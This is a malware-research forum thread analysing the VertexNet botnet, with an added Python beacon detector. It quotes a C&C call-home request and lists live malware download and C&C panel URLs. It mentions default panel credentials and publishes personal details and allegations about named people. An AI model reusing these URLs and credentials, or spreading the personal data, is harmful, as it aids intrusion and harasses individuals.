VertexNet (W32/Vertex.A, BackDoor.Vertex)

Postby Xylitol » Sun Sep 11, 2011 5:42 pm

VertexNet is malware that can be used to steal passwords (keylogger feature), perform HTTP flood attacks, download/read/execute files, etc.
The bot also has an 'uninstall' command.
It's coded by a French guy named DarkCoderSc, and for the moment the latest version is 1.2.1.

VertexNet malware calls home (tasks.php) like this:
Code:
GET /admtriii/v/tasks.php?uid={193c2e9a-7c24-11e0-b0f2-806d6172696f-2140809940} HTTP/1.1
User-Agent: V32
Host: www.cg1.fr
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Sun, 11 Sep 2011 13:51:40 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 Phusion_Passenger/3.0.2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.6
Content-Length: 0
Content-Type: text/html

It will call it frequently because this page is also used to receive orders.
The 'gate' can't be moved out of the VertexNet C&C folder due to PHP file dependencies, so if you find the gate you find the rest.
Default user/pass is root/toor, but with some magic tricks you can get inside the C&C, as with "www.cg1.fr".

If you want to start in malware reversing, VertexNet is a good one, easy to understand.
Due to its lack of features VertexNet is not really used by bad guys; they prefer more sophisticated malware.

Sample attached.
VirusTotal: 23/44 >> 52.3%
http://www.virustotal.com/file-scan/rep ... 1315111228
Xylitol
Global Moderator
 
Posts: 1409
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 419
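As an added example (not code from the post, from VertexNet or from its author), the following Python scans raw HTTP requests for the call-home pattern quoted above: a GET to tasks.php with a uid parameter shaped {GUID-<integer>} and the fixed User-Agent "V32", and separately checks whether a reply from tasks.php carried anything back, since the captured reply is a 200 with Content-Length: 0. The positive sample reuses the host and uid quoted in the post; the benign requests are constructed for illustration and are not from the thread.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Indicators taken from the call-home request quoted in the post.
TASKS_RE = re.compile(
    r"^GET\s+(?P<path>\S*/tasks\.php)\?uid=(?P<uid>\{[^}\s]+\})\s+HTTP/1\.[01]$"
)
# uid looks like a GUID (8-4-4-4-12 hex) followed by "-" and a decimal integer.
UID_RE = re.compile(
    r"^\{[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}-\d+\}$", re.I
)
VERTEX_UA = "V32"


@dataclass
class Beacon:
    host: str
    path: str
    uid: str
    user_agent: str
    indicators: List[str]  # which of the three indicators matched


def parse_http_message(raw: str) -> Optional[Dict]:
    """Split a raw HTTP/1.x message (start line, headers, optional body) into parts."""
    raw = raw.strip("\r\n").replace("\r\n", "\n")
    if not raw:
        return None
    head, _, body = raw.partition("\n\n")
    lines = head.split("\n")
    headers: Dict[str, str] = {}
    for h in lines[1:]:
        name, sep, value = h.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"start_line": lines[0], "headers": headers, "body": body}


def classify_request(raw_request: str) -> Optional[Beacon]:
    """Return a Beacon for any tasks.php?uid= poll, listing the indicators that matched.
    Returns None when the request is not a tasks.php?uid= poll at all."""
    msg = parse_http_message(raw_request)
    if msg is None:
        return None
    m = TASKS_RE.match(msg["start_line"])
    if not m:
        return None
    uid = m.group("uid")
    indicators = ["tasks.php?uid= poll"]
    if UID_RE.match(uid):
        indicators.append("uid shaped {GUID-<integer>}")
    ua = msg["headers"].get("user-agent", "")
    if ua == VERTEX_UA:
        indicators.append("User-Agent V32")
    return Beacon(msg["headers"].get("host", ""), m.group("path"), uid, ua, indicators)


def scan(requests: List[str]) -> List[Beacon]:
    """Keep only polls that match all three indicators (path, uid shape, User-Agent)."""
    hits = [classify_request(r) for r in requests]
    return [b for b in hits if b is not None and len(b.indicators) == 3]


def response_carries_task(raw_response: str) -> bool:
    """True when a 200 reply from the gate has a non-empty body; the captured reply
    in the post has Content-Length: 0, i.e. nothing was handed to the bot."""
    msg = parse_http_message(raw_response)
    if msg is None or not msg["start_line"].startswith("HTTP/1.1 200"):
        return False
    try:
        length = int(msg["headers"].get("content-length", len(msg["body"])))
    except ValueError:
        length = len(msg["body"])
    return length > 0


# Request and reply as quoted in the post (response trimmed to the relevant headers).
VERTEX_REQUEST = """
GET /admtriii/v/tasks.php?uid={193c2e9a-7c24-11e0-b0f2-806d6172696f-2140809940} HTTP/1.1
User-Agent: V32
Host: www.cg1.fr
Cache-Control: no-cache
"""
VERTEX_REPLY = """
HTTP/1.1 200 OK
Date: Sun, 11 Sep 2011 13:51:40 GMT
Content-Length: 0
Content-Type: text/html
"""
# Constructed benign traffic (not from the post): a legitimate tasks.php poll with a
# different uid shape and browser UA, and an ordinary page fetch that only shares the UA.
BENIGN_REQUESTS = [
    "GET /intranet/tasks.php?uid={00000000-0000-0000-0000-000000000000} HTTP/1.1\n"
    "User-Agent: Mozilla/5.0 (constructed sample)\nHost: intranet.example\n",
    "GET /index.html HTTP/1.1\nHost: www.example.com\nUser-Agent: V32\n",
]

if __name__ == "__main__":
    for hit in scan([VERTEX_REQUEST] + BENIGN_REQUESTS):
        print(f"VertexNet beacon to {hit.host}{hit.path} uid={hit.uid}")
    print("reply carried a task:", response_carries_task(VERTEX_REPLY))
```

Requiring all three indicators keeps the filter from firing on every site that happens to expose a tasks.php; the User-Agent alone is equally weak, which is why the second constructed request is dropped despite carrying "V32".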

Re: VertexNet (W32/Vertex.A, BackDoor.Vertex)

Postby Xylitol » Tue Sep 13, 2011 2:58 pm

Off topic: it seems VertexNet was hacked today and the original exe backdoored.
Attached is the 'attack' video; I saw it too late to get a copy of the exe.

SHA1 field 'no md5', letters in an integer-type field.
Sure, summer is not yet finished.

The VertexNet website leads to 403 Forbidden for the moment,
probably a .htaccess with Order Allow,Deny / Deny from all.

Re: VertexNet (W32/Vertex.A, BackDoor.Vertex)

Postby Xylitol » Tue Dec 20, 2011 10:05 pm

VertexNet Loader
Code:
Bot: http://blackicejoker.kilu.de/vtxnet.exe
C&C: http://blackicejoker.no-ip.biz/VertexNet/

BLACKICEJOKER.NO-IP.BIZ (193.107.17.47)
route: 193.107.17.0/24
descr: Ideal Solution Ltd
origin: AS41947
mnt-by: RU-WEBALTA-MNT
mnt-by: IDEAL-MNT


14/43 >> 32.6%
http://www.virustotal.com/file-scan/rep ... 1324341247


Re: VertexNet (W32/Vertex.A, BackDoor.Vertex)

Postby Xylitol » Thu Dec 29, 2011 10:40 am

I've done a fast graph of the VertexNet coder (without every connection, it would be really big otherwise).
He should take care of what info he leaves around.
DarklCoderSc.png


And his friend Xash (same, not completed, but contrary to DarkCoderSc this guy is really 'dark'):
Xash.png

Re: VertexNet (W32/Vertex.A, BackDoor.Vertex)

Postby Xylitol » Sat Jan 07, 2012 12:02 am

Some other 1.2 samples.
Code:
http://ekin0x.hack-free.net/King/

Application.exe: 1/43 >> 2.3%
http://www.virustotal.com/file-scan/rep ... 1325894428
FUD.exe: 13/43 >> 30.2%
http://www.virustotal.com/file-scan/rep ... 1325893404
server1.exe: 2/43 >> 4.7%
http://www.virustotal.com/file-scan/rep ... 1325893343
---
Code:
http://sakiir-hosting.eu/VertexPanel/

Application.exe: 5/43 >> 11.6%
http://www.virustotal.com/file-scan/rep ... 1325892351
CryptedTest.exe: 22/43 >> 51.2%
http://www.virustotal.com/file-scan/rep ... 1325892486
uncrypted.exe: 31/43 >> 72.1%
http://www.virustotal.com/file-scan/rep ... 1325892910
vertex-1-.exe: 32/43 >> 74.4%
http://www.virustotal.com/file-scan/rep ... 1325892910

---
By adding '/upload/' to the URLs you can find more.
The file stealer.exe found on sakiir-hosting.eu leads to an iStealer panel at:
Code:
http://sakir.hack-free.net/Stealer/

Searching info about this 'sakiir':
Code:
Steam account: http://steamcommunity.com/id/Sakiir (Steam ID: STEAM_0:0:36928960)
Mail:  wawandup@gmail.com
YouTube accounts: (really a lot) sakiirbrozz352, sakiirbrozz288, etc.
Profiles:
http://www.hackhound.org/forum/user/27927-sakiir/
http://piratologie.org/user-4196.html
http://www.the-s.fr/forum/index.php?/topic/442-presentation-de-sakiir/
http://hackforums.net/archive/index.php/thread-909206-62.html

It seems he also has some connections with French racist guys (is sakiir a racist?),
like: http://steamcommunity.com/id/londale_faf (Steam ID: STEAM_0:0:30953450)
Screenshot here: http://i.imgur.com/CvI6H.png

Re: VertexNet (W32/Vertex.A, BackDoor.Vertex)

Postby Xylitol » Fri Jan 20, 2012 5:13 pm

C&C
Code:
http://www.cythisia-botdigz.azok.org/Web%20Panel/upload/


https://www.virustotal.com/file/0f64335 ... /analysis/